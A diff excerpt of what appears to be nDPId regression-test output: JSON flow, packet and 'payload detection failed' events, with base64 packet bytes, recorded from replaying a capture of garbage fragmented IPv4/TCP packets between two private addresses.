00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2192,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1534244026825,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244026825,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiUkIyNFVFIlWV5VJkkqT1DEpQAA"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2192,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026825,"flow_last_seen":1534244026825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244026825,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2192,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1534244026825,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244026825,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiUkIyNFVFIlWV5VJkkqT1DEpQAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2193,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244026825}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":2193,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244026825,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAnsiOmhkZmxrZGE+TDxNTkI="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2194,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244026825}
@@ -5008,8 +5008,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":2503,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244026825,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAkRFVyNAJCVeSEJHVgo0MjE="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2504,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244026828}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":2504,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244026825,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAjQ2MzE5ODIw"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2505,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027129,"flow_last_seen":1534244027129,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244027129,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13617,"dst_port":10536,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2505,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1534244027129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244027129,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjUxKSgqJl4lJCNAIyQlXiYeLwAA"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2505,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027129,"flow_last_seen":1534244027129,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244027129,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13617,"dst_port":10536,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2505,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1534244027129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244027129,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjUxKSgqJl4lJCNAIyQlXiYeLwAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2506,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244027129}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":2506,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244027129,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiooKiZeJSQjcnNkbHVoZ2s="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2507,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244027129}
@@ -5634,8 +5634,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":2816,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244027129,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAmJrbnZjLy50Z2Z0Zz9HUj8="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2817,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244027133}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":2817,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244027129,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkdSP3NSPzc0"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2818,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027433,"flow_last_seen":1534244027433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244027433,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":14387,"dst_port":14646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2818,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1534244027433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244027433,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjgzOTYpKComXiUkI0AhQCMkIQAA"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2818,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027433,"flow_last_seen":1534244027433,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244027433,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":14387,"dst_port":14646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2818,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1534244027433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244027433,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjgzOTYpKComXiUkI0AhQCMkIQAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2819,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244027433}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":2819,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244027433,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiQlXiYqKCkoKiZeJSQjQCM="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2820,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244027433}
@@ -6260,8 +6260,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":3129,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244027433,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiYqKComXiUkIyYqKEtJSkg="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3130,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244027437}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":3130,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244027433,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkdGRDIqJkRG"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3131,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027737,"flow_last_seen":1534244027737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244027737,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18248,"dst_port":19019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3131,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1534244027737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244027737,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkdISksmXiUkIyNFVFIlWV76VAAA"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3131,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027737,"flow_last_seen":1534244027737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244027737,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18248,"dst_port":19019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3131,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1534244027737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244027737,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkdISksmXiUkIyNFVFIlWV76VAAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3132,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244027737}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":3132,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244027737,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAlUmSSpPUHsiOmhkZmxrZGE="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3133,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244027737}
@@ -6886,8 +6886,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":3442,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244027737,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAk1OQkhHRkRFVyNAJCVeSEI="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3443,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244027741}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":3443,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244027737,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkdWCjQyMTQ2"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3444,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028041,"flow_last_seen":1534244028041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244028041,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13105,"dst_port":14648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3444,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1534244028041,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028041,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjMxOTgyMDUxKSgqJl4lJCNCBAAA"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3444,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028041,"flow_last_seen":1534244028041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244028041,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13105,"dst_port":14648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3444,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1534244028041,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028041,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjMxOTgyMDUxKSgqJl4lJCNCBAAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3445,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028041}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":3445,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028041,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAkAjJCVeJiooKiZeJSQjcnM="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3446,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028041}
@@ -7512,8 +7512,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":3755,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028041,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAmhna2Zkc2JrbnZjLy50Z2Y="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3756,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244028045}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":3756,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244028041,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAnRnP0dSP0dS"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3757,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028345,"flow_last_seen":1534244028345,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244028345,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16243,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3757,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1534244028345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028345,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAj9zUj83NDgzOTYpKComXiX\/oQAA"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3757,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028345,"flow_last_seen":1534244028345,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244028345,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16243,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3757,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1534244028345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028345,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAj9zUj83NDgzOTYpKComXiX\/oQAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3758,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028345}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":3758,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028345,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiQjQCFAIyQlXiYqKCkoKiY="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3759,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028345}
@@ -8138,8 +8138,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":4068,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028345,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiNAIyQlXiYqKComXiUkIyY="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4069,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244028349}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":4069,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244028345,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAiooS0lKSEdG"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4070,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028649,"flow_last_seen":1534244028649,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244028649,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17458,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4070,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1534244028649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028649,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkQyKiZERkdISksmXiUkIyM4jgAA"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4070,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028649,"flow_last_seen":1534244028649,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244028649,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17458,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4070,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1534244028649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028649,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkQyKiZERkdISksmXiUkIyM4jgAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4071,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028649}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":4071,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028649,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAkVUUiVZXlUmSSpPUHsiOmg="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4072,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028649}
@@ -8764,8 +8764,8 @@
